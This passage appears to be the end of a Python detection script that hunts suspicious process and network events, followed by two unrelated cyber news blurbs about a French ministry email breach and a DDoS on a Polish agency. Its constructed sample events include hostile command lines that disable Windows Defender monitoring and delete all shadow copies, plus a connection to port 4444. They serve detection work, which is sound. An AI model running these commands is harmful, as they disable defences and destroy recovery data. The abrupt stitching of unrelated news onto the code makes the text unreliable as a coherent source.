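            alerts.append((n, rule, ev.get("Computer", "?"), basename(ev.get("Image", ""))))
    return alerts


# --- constructed sample telemetry (not real events) ---
SAMPLE_EVENTS = [
    {"EventID": 1, "Computer": "web01", "ParentImage": r"C:\Program Files\nodejs\node.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -c Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"EventID": 1, "Computer": "web01", "ParentImage": r"C:\Program Files\nodejs\node.exe",
     "Image": r"C:\Program Files\nodejs\node.exe", "CommandLine": "node.exe worker.js"},
    {"EventID": 3, "Computer": "web01", "Image": r"C:\Program Files\nodejs\node.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": 4444},
    {"EventID": 3, "Computer": "web01", "Image": r"C:\Program Files\nodejs\node.exe",
     "DestinationIp": "10.0.0.5", "DestinationPort": 5432},
    {"EventID": 1, "Computer": "web01", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": "vssadmin.exe delete shadows /all /quiet"},
]
SAMPLE_LOG = "\n".join(json.dumps(e) for e in SAMPLE_EVENTS)

if __name__ == "__main__":
    for alert in hunt(SAMPLE_LOG):
        print(alert)
```

A node process forking a worker and a node process talking to its own database on a private address stay quiet; the point of the egress rule is the combination of a server-side JavaScript runtime, a non-internal destination and a non-web port, which is what a reverse shell or staging download looks like in the minute between exploitation and encryption.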

France investigates Interior Ministry email breach and access to confidential files

France's Interior Ministry said it is investigating the “reality and scope” of a post on a cybercrime forum by a user claiming to have hacked the institution.

A high-confidence DDoS attack has targeted Poland 🇵🇱, specifically the Polish Agency for Enterprise Development (PARP). #CyberThreat #DDoS #GovernmentSecurity